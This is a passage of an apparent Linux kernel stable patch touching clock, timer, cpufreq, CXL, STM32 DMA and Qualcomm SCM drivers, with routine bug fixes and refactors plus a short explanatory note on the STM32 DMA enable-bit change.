+@@ -164,7 +162,6 @@ static struct clk_alpha_pll_postdiv gpll6 = {
+ 				&gpll6_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -195,7 +192,6 @@ static struct clk_alpha_pll_postdiv gpll4 = {
+ 				&gpll4_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -246,7 +242,6 @@ static struct clk_alpha_pll_postdiv gpll2 = {
+ 				&gpll2_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -277,7 +272,6 @@ static struct clk_alpha_pll_postdiv nss_crypto_pll = {
+ 				&nss_crypto_pll_main.clkr.hw },
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-ipq8074.c b/drivers/clk/qcom/gcc-ipq8074.c
+index 42d185fe19c8c..b2e83b38976e5 100644
+--- a/drivers/clk/qcom/gcc-ipq8074.c
++++ b/drivers/clk/qcom/gcc-ipq8074.c
+@@ -419,7 +419,6 @@ static struct clk_fixed_factor gpll0_out_main_div2 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_fixed_factor_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -466,7 +465,6 @@ static struct clk_alpha_pll_postdiv gpll2 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -499,7 +497,6 @@ static struct clk_alpha_pll_postdiv gpll4 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -533,7 +530,6 @@ static struct clk_alpha_pll_postdiv gpll6 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -547,7 +543,6 @@ static struct clk_fixed_factor gpll6_out_main_div2 = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_fixed_factor_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+@@ -612,7 +607,6 @@ static struct clk_alpha_pll_postdiv nss_crypto_pll = {
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_ro_ops,
+-		.flags = CLK_SET_RATE_PARENT,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/socfpga/stratix10-clk.h b/drivers/clk/socfpga/stratix10-clk.h
+index 75234e0783e1c..83fe4eb3133cb 100644
+--- a/drivers/clk/socfpga/stratix10-clk.h
++++ b/drivers/clk/socfpga/stratix10-clk.h
+@@ -7,8 +7,10 @@
+ #define	__STRATIX10_CLK_H
+ 
+ struct stratix10_clock_data {
+-	struct clk_hw_onecell_data	clk_data;
+ 	void __iomem		*base;
++
++	/* Must be last */
++	struct clk_hw_onecell_data	clk_data;
+ };
+ 
+ struct stratix10_pll_clock {
+diff --git a/drivers/clk/visconti/pll.h b/drivers/clk/visconti/pll.h
+index 16dae35ab3701..c4bd40676da4b 100644
+--- a/drivers/clk/visconti/pll.h
++++ b/drivers/clk/visconti/pll.h
+@@ -15,9 +15,10 @@
+ 
+ struct visconti_pll_provider {
+ 	void __iomem *reg_base;
+-	struct regmap *regmap;
+-	struct clk_hw_onecell_data clk_data;
+ 	struct device_node *node;
++
++	/* Must be last */
++	struct clk_hw_onecell_data clk_data;
+ };
+ 
+ #define VISCONTI_PLL_RATE(_rate, _dacen, _dsmen, \
+diff --git a/drivers/clocksource/timer-atmel-tcb.c b/drivers/clocksource/timer-atmel-tcb.c
+index 27af17c995900..2a90c92a9182a 100644
+--- a/drivers/clocksource/timer-atmel-tcb.c
++++ b/drivers/clocksource/timer-atmel-tcb.c
+@@ -315,6 +315,7 @@ static void __init tcb_setup_dual_chan(struct atmel_tc *tc, int mck_divisor_idx)
+ 	writel(mck_divisor_idx			/* likely divide-by-8 */
+ 			| ATMEL_TC_WAVE
+ 			| ATMEL_TC_WAVESEL_UP		/* free-run */
++			| ATMEL_TC_ASWTRG_SET		/* TIOA0 rises at software trigger */
+ 			| ATMEL_TC_ACPA_SET		/* TIOA0 rises at 0 */
+ 			| ATMEL_TC_ACPC_CLEAR,		/* (duty cycle 50%) */
+ 			tcaddr + ATMEL_TC_REG(0, CMR));
+diff --git a/drivers/clocksource/timer-imx-gpt.c b/drivers/clocksource/timer-imx-gpt.c
+index 7b2c70f2f353b..fabff69e52e58 100644
+--- a/drivers/clocksource/timer-imx-gpt.c
++++ b/drivers/clocksource/timer-imx-gpt.c
+@@ -454,12 +454,16 @@ static int __init mxc_timer_init_dt(struct device_node *np,  enum imx_gpt_type t
+ 		return -ENOMEM;
+ 
+ 	imxtm->base = of_iomap(np, 0);
+-	if (!imxtm->base)
+-		return -ENXIO;
++	if (!imxtm->base) {
++		ret = -ENXIO;
++		goto err_kfree;
++	}
+ 
+ 	imxtm->irq = irq_of_parse_and_map(np, 0);
+-	if (imxtm->irq <= 0)
+-		return -EINVAL;
++	if (imxtm->irq <= 0) {
++		ret = -EINVAL;
++		goto err_kfree;
++	}
+ 
+ 	imxtm->clk_ipg = of_clk_get_by_name(np, "ipg");
+ 
+@@ -472,11 +476,15 @@ static int __init mxc_timer_init_dt(struct device_node *np,  enum imx_gpt_type t
+ 
+ 	ret = _mxc_timer_init(imxtm);
+ 	if (ret)
+-		return ret;
++		goto err_kfree;
+ 
+ 	initialized = 1;
+ 
+ 	return 0;
++
++err_kfree:
++	kfree(imxtm);
++	return ret;
+ }
+ 
+ static int __init imx1_timer_init_dt(struct device_node *np)
+diff --git a/drivers/cpufreq/cpufreq_stats.c b/drivers/cpufreq/cpufreq_stats.c
+index 1570d6f3e75d3..6e57df7a2249f 100644
+--- a/drivers/cpufreq/cpufreq_stats.c
++++ b/drivers/cpufreq/cpufreq_stats.c
+@@ -131,25 +131,25 @@ static ssize_t show_trans_table(struct cpufreq_policy *policy, char *buf)
+ 	len += scnprintf(buf + len, PAGE_SIZE - len, "   From  :    To\n");
+ 	len += scnprintf(buf + len, PAGE_SIZE - len, "         : ");
+ 	for (i = 0; i < stats->state_num; i++) {
+-		if (len >= PAGE_SIZE)
++		if (len >= PAGE_SIZE - 1)
+ 			break;
+ 		len += scnprintf(buf + len, PAGE_SIZE - len, "%9u ",
+ 				stats->freq_table[i]);
+ 	}
+-	if (len >= PAGE_SIZE)
+-		return PAGE_SIZE;
++	if (len >= PAGE_SIZE - 1)
++		return PAGE_SIZE - 1;
+ 
+ 	len += scnprintf(buf + len, PAGE_SIZE - len, "\n");
+ 
+ 	for (i = 0; i < stats->state_num; i++) {
+-		if (len >= PAGE_SIZE)
++		if (len >= PAGE_SIZE - 1)
+ 			break;
+ 
+ 		len += scnprintf(buf + len, PAGE_SIZE - len, "%9u: ",
+ 				stats->freq_table[i]);
+ 
+ 		for (j = 0; j < stats->state_num; j++) {
+-			if (len >= PAGE_SIZE)
++			if (len >= PAGE_SIZE - 1)
+ 				break;
+ 
+ 			if (pending)
+@@ -159,12 +159,12 @@ static ssize_t show_trans_table(struct cpufreq_policy *policy, char *buf)
+ 
+ 			len += scnprintf(buf + len, PAGE_SIZE - len, "%9u ", count);
+ 		}
+-		if (len >= PAGE_SIZE)
++		if (len >= PAGE_SIZE - 1)
+ 			break;
+ 		len += scnprintf(buf + len, PAGE_SIZE - len, "\n");
+ 	}
+ 
+-	if (len >= PAGE_SIZE) {
++	if (len >= PAGE_SIZE - 1) {
+ 		pr_warn_once("cpufreq transition table exceeds PAGE_SIZE. Disabling\n");
+ 		return -EFBIG;
+ 	}
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index a4a3895c74181..f9acf7ecc41be 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -841,6 +841,8 @@ static void qm_poll_req_cb(struct hisi_qp *qp)
+ 		qm_db(qm, qp->qp_id, QM_DOORBELL_CMD_CQ,
+ 		      qp->qp_status.cq_head, 0);
+ 		atomic_dec(&qp->qp_status.used);
++
++		cond_resched();
+ 	}
+ 
+ 	/* set c_flag */
+diff --git a/drivers/cxl/acpi.c b/drivers/cxl/acpi.c
+index 07b184382707e..dd610556a3afa 100644
+--- a/drivers/cxl/acpi.c
++++ b/drivers/cxl/acpi.c
+@@ -219,7 +219,6 @@ static int add_host_bridge_uport(struct device *match, void *arg)
+ 	port = devm_cxl_add_port(host, match, dport->component_reg_phys, dport);
+ 	if (IS_ERR(port))
+ 		return PTR_ERR(port);
+-	dev_dbg(host, "%s: add: %s\n", dev_name(match), dev_name(&port->dev));
+ 
+ 	return 0;
+ }
+@@ -465,7 +464,6 @@ static int cxl_acpi_probe(struct platform_device *pdev)
+ 	root_port = devm_cxl_add_port(host, host, CXL_RESOURCE_NONE, NULL);
+ 	if (IS_ERR(root_port))
+ 		return PTR_ERR(root_port);
+-	dev_dbg(host, "add: %s\n", dev_name(&root_port->dev));
+ 
+ 	rc = bus_for_each_dev(adev->dev.bus, NULL, root_port,
+ 			      add_host_bridge_dport);
+diff --git a/drivers/cxl/core/core.h b/drivers/cxl/core/core.h
+index 1d8f87be283fb..cbee2340f1bce 100644
+--- a/drivers/cxl/core/core.h
++++ b/drivers/cxl/core/core.h
+@@ -56,17 +56,6 @@ resource_size_t cxl_dpa_size(struct cxl_endpoint_decoder *cxled);
+ resource_size_t cxl_dpa_resource_start(struct cxl_endpoint_decoder *cxled);
+ extern struct rw_semaphore cxl_dpa_rwsem;
+ 
+-bool is_switch_decoder(struct device *dev);
+-struct cxl_switch_decoder *to_cxl_switch_decoder(struct device *dev);
+-static inline struct cxl_ep *cxl_ep_load(struct cxl_port *port,
+-					 struct cxl_memdev *cxlmd)
+-{
+-	if (!port)
+-		return NULL;
+-
+-	return xa_load(&port->endpoints, (unsigned long)&cxlmd->dev);
+-}
+-
+ int cxl_memdev_init(void);
+ void cxl_memdev_exit(void);
+ void cxl_mbox_init(void);
+diff --git a/drivers/cxl/core/hdm.c b/drivers/cxl/core/hdm.c
+index 5aa0726aafe6f..8c1db4e1b816d 100644
+--- a/drivers/cxl/core/hdm.c
++++ b/drivers/cxl/core/hdm.c
+@@ -276,7 +276,7 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 	return 0;
+ }
+ 
+-static int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
++int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 				resource_size_t base, resource_size_t len,
+ 				resource_size_t skipped)
+ {
+@@ -292,6 +292,7 @@ static int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 
+ 	return devm_add_action_or_reset(&port->dev, cxl_dpa_release, cxled);
+ }
++EXPORT_SYMBOL_NS_GPL(devm_cxl_dpa_reserve, CXL);
+ 
+ resource_size_t cxl_dpa_size(struct cxl_endpoint_decoder *cxled)
+ {
+diff --git a/drivers/cxl/core/port.c b/drivers/cxl/core/port.c
+index e7556864ea808..bd41424319807 100644
+--- a/drivers/cxl/core/port.c
++++ b/drivers/cxl/core/port.c
+@@ -455,6 +455,7 @@ bool is_switch_decoder(struct device *dev)
+ {
+ 	return is_root_decoder(dev) || dev->type == &cxl_decoder_switch_type;
+ }
++EXPORT_SYMBOL_NS_GPL(is_switch_decoder, CXL);
+ 
+ struct cxl_decoder *to_cxl_decoder(struct device *dev)
+ {
+@@ -482,6 +483,7 @@ struct cxl_switch_decoder *to_cxl_switch_decoder(struct device *dev)
+ 		return NULL;
+ 	return container_of(dev, struct cxl_switch_decoder, cxld.dev);
+ }
++EXPORT_SYMBOL_NS_GPL(to_cxl_switch_decoder, CXL);
+ 
+ static void cxl_ep_release(struct cxl_ep *ep)
+ {
+@@ -655,16 +657,10 @@ err:
+ 	return ERR_PTR(rc);
+ }
+ 
+-/**
+- * devm_cxl_add_port - register a cxl_port in CXL memory decode hierarchy
+- * @host: host device for devm operations
+- * @uport: "physical" device implementing this upstream port
+- * @component_reg_phys: (optional) for configurable cxl_port instances
+- * @parent_dport: next hop up in the CXL memory decode hierarchy
+- */
+-struct cxl_port *devm_cxl_add_port(struct device *host, struct device *uport,
+-				   resource_size_t component_reg_phys,
+-				   struct cxl_dport *parent_dport)
++static struct cxl_port *__devm_cxl_add_port(struct device *host,
++					    struct device *uport,
++					    resource_size_t component_reg_phys,
++					    struct cxl_dport *parent_dport)
+ {
+ 	struct cxl_port *port;
+ 	struct device *dev;
+@@ -702,6 +698,40 @@ err:
+ 	put_device(dev);
+ 	return ERR_PTR(rc);
+ }
++
++/**
++ * devm_cxl_add_port - register a cxl_port in CXL memory decode hierarchy
++ * @host: host device for devm operations
++ * @uport: "physical" device implementing this upstream port
++ * @component_reg_phys: (optional) for configurable cxl_port instances
++ * @parent_dport: next hop up in the CXL memory decode hierarchy
++ */
++struct cxl_port *devm_cxl_add_port(struct device *host, struct device *uport,
++				   resource_size_t component_reg_phys,
++				   struct cxl_dport *parent_dport)
++{
++	struct cxl_port *port, *parent_port;
++
++	port = __devm_cxl_add_port(host, uport, component_reg_phys,
++				   parent_dport);
++
++	parent_port = parent_dport ? parent_dport->port : NULL;
++	if (IS_ERR(port)) {
++		dev_dbg(uport, "Failed to add%s%s%s: %ld\n",
++			parent_port ? " port to " : "",
++			parent_port ? dev_name(&parent_port->dev) : "",
++			parent_port ? "" : " root port",
++			PTR_ERR(port));
++	} else {
++		dev_dbg(uport, "%s added%s%s%s\n",
++			dev_name(&port->dev),
++			parent_port ? " to " : "",
++			parent_port ? dev_name(&parent_port->dev) : "",
++			parent_port ? "" : " (root port)");
++	}
++
++	return port;
++}
+ EXPORT_SYMBOL_NS_GPL(devm_cxl_add_port, CXL);
+ 
+ struct pci_bus *cxl_port_to_pci_bus(struct cxl_port *port)
+@@ -1122,47 +1152,6 @@ static void reap_dports(struct cxl_port *port)
+ 	}
+ }
+ 
+-int devm_cxl_add_endpoint(struct cxl_memdev *cxlmd,
+-			  struct cxl_dport *parent_dport)
+-{
+-	struct cxl_port *parent_port = parent_dport->port;
+-	struct cxl_dev_state *cxlds = cxlmd->cxlds;
+-	struct cxl_port *endpoint, *iter, *down;
+-	int rc;
+-
+-	/*
+-	 * Now that the path to the root is established record all the
+-	 * intervening ports in the chain.
+-	 */
+-	for (iter = parent_port, down = NULL; !is_cxl_root(iter);
+-	     down = iter, iter = to_cxl_port(iter->dev.parent)) {
+-		struct cxl_ep *ep;
+-
+-		ep = cxl_ep_load(iter, cxlmd);
+-		ep->next = down;
+-	}
+-
+-	endpoint = devm_cxl_add_port(&parent_port->dev, &cxlmd->dev,
+-				     cxlds->component_reg_phys, parent_dport);
+-	if (IS_ERR(endpoint))
+-		return PTR_ERR(endpoint);
+-
+-	dev_dbg(&cxlmd->dev, "add: %s\n", dev_name(&endpoint->dev));
+-
+-	rc = cxl_endpoint_autoremove(cxlmd, endpoint);
+-	if (rc)
+-		return rc;
+-
+-	if (!endpoint->dev.driver) {
+-		dev_err(&cxlmd->dev, "%s failed probe\n",
+-			dev_name(&endpoint->dev));
+-		return -ENXIO;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_NS_GPL(devm_cxl_add_endpoint, CXL);
+-
+ static void cxl_detach_ep(void *data)
+ {
+ 	struct cxl_memdev *cxlmd = data;
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index 9709bbf773b72..ebc1b028555ca 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -1012,7 +1012,14 @@ static int cxl_port_setup_targets(struct cxl_port *port,
+ 	}
+ 
+ 	if (is_cxl_root(parent_port)) {
+-		parent_ig = cxlrd->cxlsd.cxld.interleave_granularity;
++		/*
++		 * Root decoder IG is always set to value in CFMWS which
++		 * may be different than this region's IG.  We can use the
++		 * region's IG here since interleave_granularity_store()
++		 * does not allow interleaved host-bridges with
++		 * root IG != region IG.
++		 */
++		parent_ig = p->interleave_granularity;
+ 		parent_iw = cxlrd->cxlsd.cxld.interleave_ways;
+ 		/*
+ 		 * For purposes of address bit routing, use power-of-2 math for
+@@ -1181,29 +1188,13 @@ static int cxl_region_setup_targets(struct cxl_region *cxlr)
+ 	return 0;
+ }
+ 
+-static int cxl_region_attach(struct cxl_region *cxlr,
+-			     struct cxl_endpoint_decoder *cxled, int pos)
++static int cxl_region_validate_position(struct cxl_region *cxlr,
++					struct cxl_endpoint_decoder *cxled,
++					int pos)
+ {
+-	struct cxl_root_decoder *cxlrd = to_cxl_root_decoder(cxlr->dev.parent);
+ 	struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
+-	struct cxl_port *ep_port, *root_port, *iter;
+ 	struct cxl_region_params *p = &cxlr->params;
+-	struct cxl_dport *dport;
+-	int i, rc = -ENXIO;
+-
+-	if (cxled->mode == CXL_DECODER_DEAD) {
+-		dev_dbg(&cxlr->dev, "%s dead\n", dev_name(&cxled->cxld.dev));
+-		return -ENODEV;
+-	}
+-
+-	/* all full of members, or interleave config not established? */
+-	if (p->state > CXL_CONFIG_INTERLEAVE_ACTIVE) {
+-		dev_dbg(&cxlr->dev, "region already active\n");
+-		return -EBUSY;
+-	} else if (p->state < CXL_CONFIG_INTERLEAVE_ACTIVE) {
+-		dev_dbg(&cxlr->dev, "interleave config missing\n");
+-		return -ENXIO;
+-	}
++	int i;
+ 
+ 	if (pos < 0 || pos >= p->interleave_ways) {
+ 		dev_dbg(&cxlr->dev, "position %d out of range %d\n", pos,
+@@ -1242,6 +1233,77 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		}
+ 	}
+ 
++	return 0;
++}
++
++static int cxl_region_attach_position(struct cxl_region *cxlr,
++				      struct cxl_root_decoder *cxlrd,
++				      struct cxl_endpoint_decoder *cxled,
++				      const struct cxl_dport *dport, int pos)
++{
++	struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
++	struct cxl_port *iter;
++	int rc;
++
++	if (cxlrd->calc_hb(cxlrd, pos) != dport) {
++		dev_dbg(&cxlr->dev, "%s:%s invalid target position for %s\n",
++			dev_name(&cxlmd->dev), dev_name(&cxled->cxld.dev),
++			dev_name(&cxlrd->cxlsd.cxld.dev));
++		return -ENXIO;
++	}
++
++	for (iter = cxled_to_port(cxled); !is_cxl_root(iter);
++	     iter = to_cxl_port(iter->dev.parent)) {
++		rc = cxl_port_attach_region(iter, cxlr, cxled, pos);
++		if (rc)
++			goto err;
++	}
++
++	return 0;
++
++err:
++	for (iter = cxled_to_port(cxled); !is_cxl_root(iter);
++	     iter = to_cxl_port(iter->dev.parent))
++		cxl_port_detach_region(iter, cxlr, cxled);
++	return rc;
++}
++
++static int cxl_region_attach(struct cxl_region *cxlr,
++			     struct cxl_endpoint_decoder *cxled, int pos)
++{
++	struct cxl_root_decoder *cxlrd = to_cxl_root_decoder(cxlr->dev.parent);
++	struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
++	struct cxl_region_params *p = &cxlr->params;
++	struct cxl_port *ep_port, *root_port;
++	struct cxl_dport *dport;
++	int rc = -ENXIO;
++
++	if (cxled->mode != cxlr->mode) {
++		dev_dbg(&cxlr->dev, "%s region mode: %d mismatch: %d\n",
++			dev_name(&cxled->cxld.dev), cxlr->mode, cxled->mode);
++		return -EINVAL;
++	}
++
++	if (cxled->mode == CXL_DECODER_DEAD) {
++		dev_dbg(&cxlr->dev, "%s dead\n", dev_name(&cxled->cxld.dev));
++		return -ENODEV;
++	}
++
++	/* all full of members, or interleave config not established? */
++	if (p->state > CXL_CONFIG_INTERLEAVE_ACTIVE) {
++		dev_dbg(&cxlr->dev, "region already active\n");
++		return -EBUSY;
++	} else if (p->state < CXL_CONFIG_INTERLEAVE_ACTIVE) {
++		dev_dbg(&cxlr->dev, "interleave config missing\n");
++		return -ENXIO;
++	}
++
++	if (p->nr_targets >= p->interleave_ways) {
++		dev_dbg(&cxlr->dev, "region already has %d endpoints\n",
++			p->nr_targets);
++		return -EINVAL;
++	}
++
+ 	ep_port = cxled_to_port(cxled);
+ 	root_port = cxlrd_to_port(cxlrd);
+ 	dport = cxl_find_dport_by_dev(root_port, ep_port->host_bridge);
+@@ -1252,13 +1314,6 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		return -ENXIO;
+ 	}
+ 
+-	if (cxlrd->calc_hb(cxlrd, pos) != dport) {
+-		dev_dbg(&cxlr->dev, "%s:%s invalid target position for %s\n",
+-			dev_name(&cxlmd->dev), dev_name(&cxled->cxld.dev),
+-			dev_name(&cxlrd->cxlsd.cxld.dev));
+-		return -ENXIO;
+-	}
+-
+ 	if (cxled->cxld.target_type != cxlr->type) {
+ 		dev_dbg(&cxlr->dev, "%s:%s type mismatch: %d vs %d\n",
+ 			dev_name(&cxlmd->dev), dev_name(&cxled->cxld.dev),
+@@ -1282,12 +1337,13 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		return -EINVAL;
+ 	}
+ 
+-	for (iter = ep_port; !is_cxl_root(iter);
+-	     iter = to_cxl_port(iter->dev.parent)) {
+-		rc = cxl_port_attach_region(iter, cxlr, cxled, pos);
+-		if (rc)
+-			goto err;
+-	}
++	rc = cxl_region_validate_position(cxlr, cxled, pos);
++	if (rc)
++		return rc;
++
++	rc = cxl_region_attach_position(cxlr, cxlrd, cxled, dport, pos);
++	if (rc)
++		return rc;
+ 
+ 	p->targets[pos] = cxled;
+ 	cxled->pos = pos;
+@@ -1296,7 +1352,7 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 	if (p->nr_targets == p->interleave_ways) {
+ 		rc = cxl_region_setup_targets(cxlr);
+ 		if (rc)
+-			goto err_decrement;
++			return rc;
+ 		p->state = CXL_CONFIG_ACTIVE;
+ 	}
+ 
+@@ -1308,14 +1364,6 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 	};
+ 
+ 	return 0;
+-
+-err_decrement:
+-	p->nr_targets--;
+-err:
+-	for (iter = ep_port; !is_cxl_root(iter);
+-	     iter = to_cxl_port(iter->dev.parent))
+-		cxl_port_detach_region(iter, cxlr, cxled);
+-	return rc;
+ }
+ 
+ static int cxl_region_detach(struct cxl_endpoint_decoder *cxled)
+diff --git a/drivers/cxl/cxl.h b/drivers/cxl/cxl.h
+index ac75554b5d763..7750ccb7652db 100644
+--- a/drivers/cxl/cxl.h
++++ b/drivers/cxl/cxl.h
+@@ -562,8 +562,6 @@ struct pci_bus *cxl_port_to_pci_bus(struct cxl_port *port);
+ struct cxl_port *devm_cxl_add_port(struct device *host, struct device *uport,
+ 				   resource_size_t component_reg_phys,
+ 				   struct cxl_dport *parent_dport);
+-int devm_cxl_add_endpoint(struct cxl_memdev *cxlmd,
+-			  struct cxl_dport *parent_dport);
+ struct cxl_port *find_cxl_root(struct device *dev);
+ int devm_cxl_enumerate_ports(struct cxl_memdev *cxlmd);
+ int cxl_bus_rescan(void);
+@@ -577,8 +575,10 @@ struct cxl_dport *devm_cxl_add_dport(struct cxl_port *port,
+ 
+ struct cxl_decoder *to_cxl_decoder(struct device *dev);
+ struct cxl_root_decoder *to_cxl_root_decoder(struct device *dev);
++struct cxl_switch_decoder *to_cxl_switch_decoder(struct device *dev);
+ struct cxl_endpoint_decoder *to_cxl_endpoint_decoder(struct device *dev);
+ bool is_root_decoder(struct device *dev);
++bool is_switch_decoder(struct device *dev);
+ bool is_endpoint_decoder(struct device *dev);
+ struct cxl_root_decoder *cxl_root_decoder_alloc(struct cxl_port *port,
+ 						unsigned int nr_targets);
+diff --git a/drivers/cxl/cxlmem.h b/drivers/cxl/cxlmem.h
+index 88e3a8e54b6a4..b58a5b782e5dc 100644
+--- a/drivers/cxl/cxlmem.h
++++ b/drivers/cxl/cxlmem.h
+@@ -75,6 +75,18 @@ static inline bool is_cxl_endpoint(struct cxl_port *port)
+ }
+ 
+ struct cxl_memdev *devm_cxl_add_memdev(struct cxl_dev_state *cxlds);
++int devm_cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
++			 resource_size_t base, resource_size_t len,
++			 resource_size_t skipped);
++
++static inline struct cxl_ep *cxl_ep_load(struct cxl_port *port,
++					 struct cxl_memdev *cxlmd)
++{
++	if (!port)
++		return NULL;
++
++	return xa_load(&port->endpoints, (unsigned long)&cxlmd->dev);
++}
+ 
+ /**
+  * struct cxl_mbox_cmd - A command to be submitted to hardware.
+diff --git a/drivers/cxl/mem.c b/drivers/cxl/mem.c
+index 64ccf053d32c3..80263d12a8541 100644
+--- a/drivers/cxl/mem.c
++++ b/drivers/cxl/mem.c
+@@ -45,6 +45,44 @@ static int cxl_mem_dpa_show(struct seq_file *file, void *data)
+ 	return 0;
+ }
+ 
++static int devm_cxl_add_endpoint(struct cxl_memdev *cxlmd,
++				 struct cxl_dport *parent_dport)
++{
++	struct cxl_port *parent_port = parent_dport->port;
++	struct cxl_dev_state *cxlds = cxlmd->cxlds;
++	struct cxl_port *endpoint, *iter, *down;
++	int rc;
++
++	/*
++	 * Now that the path to the root is established record all the
++	 * intervening ports in the chain.
++	 */
++	for (iter = parent_port, down = NULL; !is_cxl_root(iter);
++	     down = iter, iter = to_cxl_port(iter->dev.parent)) {
++		struct cxl_ep *ep;
++
++		ep = cxl_ep_load(iter, cxlmd);
++		ep->next = down;
++	}
++
++	endpoint = devm_cxl_add_port(&parent_port->dev, &cxlmd->dev,
++				     cxlds->component_reg_phys, parent_dport);
++	if (IS_ERR(endpoint))
++		return PTR_ERR(endpoint);
++
++	rc = cxl_endpoint_autoremove(cxlmd, endpoint);
++	if (rc)
++		return rc;
++
++	if (!endpoint->dev.driver) {
++		dev_err(&cxlmd->dev, "%s failed probe\n",
++			dev_name(&endpoint->dev));
++		return -ENXIO;
++	}
++
++	return 0;
++}
++
+ static int cxl_mem_probe(struct device *dev)
+ {
+ 	struct cxl_memdev *cxlmd = to_cxl_memdev(dev);
+diff --git a/drivers/dma/stm32-mdma.c b/drivers/dma/stm32-mdma.c
+index 4e9bab61f4663..65ef1f5ca6b89 100644
+--- a/drivers/dma/stm32-mdma.c
++++ b/drivers/dma/stm32-mdma.c
+@@ -490,7 +490,7 @@ static int stm32_mdma_set_xfer_param(struct stm32_mdma_chan *chan,
+ 	src_maxburst = chan->dma_config.src_maxburst;
+ 	dst_maxburst = chan->dma_config.dst_maxburst;
+ 
+-	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id));
++	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id)) & ~STM32_MDMA_CCR_EN;
+ 	ctcr = stm32_mdma_read(dmadev, STM32_MDMA_CTCR(chan->id));
+ 	ctbr = stm32_mdma_read(dmadev, STM32_MDMA_CTBR(chan->id));
+ 
+@@ -966,7 +966,7 @@ stm32_mdma_prep_dma_memcpy(struct dma_chan *c, dma_addr_t dest, dma_addr_t src,
+ 	if (!desc)
+ 		return NULL;
+ 
+-	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id));
++	ccr = stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id)) & ~STM32_MDMA_CCR_EN;
+ 	ctcr = stm32_mdma_read(dmadev, STM32_MDMA_CTCR(chan->id));
+ 	ctbr = stm32_mdma_read(dmadev, STM32_MDMA_CTBR(chan->id));
+ 	cbndtr = stm32_mdma_read(dmadev, STM32_MDMA_CBNDTR(chan->id));
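
Note: both stm32-mdma hunks strip STM32_MDMA_CCR_EN from the cached register value so that writing the rebuilt CCR back cannot re-enable the channel before configuration is complete. The read-modify-write pattern in a tiny sketch (bit position and register value are made up for illustration):

#include <stdint.h>
#include <stdio.h>

#define CCR_EN (1u << 0)	/* illustrative bit position only */

int main(void)
{
	uint32_t hw_ccr = 0x00000130 | CCR_EN;	/* pretend readback: running */
	uint32_t ccr = hw_ccr & ~CCR_EN;	/* cache with EN stripped */

	/* ... fold the new transfer configuration into ccr ... */

	printf("cached CCR = 0x%08x (EN clear, safe to write back)\n", ccr);
	return 0;
}
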
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index 51eb85354c058..58f1a86065dc9 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -164,6 +164,12 @@ static enum qcom_scm_convention __get_convention(void)
+ 	if (likely(qcom_scm_convention != SMC_CONVENTION_UNKNOWN))
+ 		return qcom_scm_convention;
+ 
++	/*
++	 * Per the "SMC calling convention specification", the 64-bit calling
++	 * convention can only be used when the client is 64-bit, otherwise
++	 * system will encounter the undefined behaviour.
++	 */
++#if IS_ENABLED(CONFIG_ARM64)
+ 	/*
+ 	 * Device isn't required as there is only one argument - no device
+ 	 * needed to dma_map_single to secure world
+@@ -184,6 +190,7 @@ static enum qcom_scm_convention __get_convention(void)
+ 		forced = true;
+ 		goto found;
+ 	}
++#endif
+ 
+ 	probed_convention = SMC_CONVENTION_ARM_32;
+ 	ret = __scm_smc_call(NULL, &desc, probed_convention, &res, true);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+index 30c28a69e847d..e4ad2bd8d8110 100644
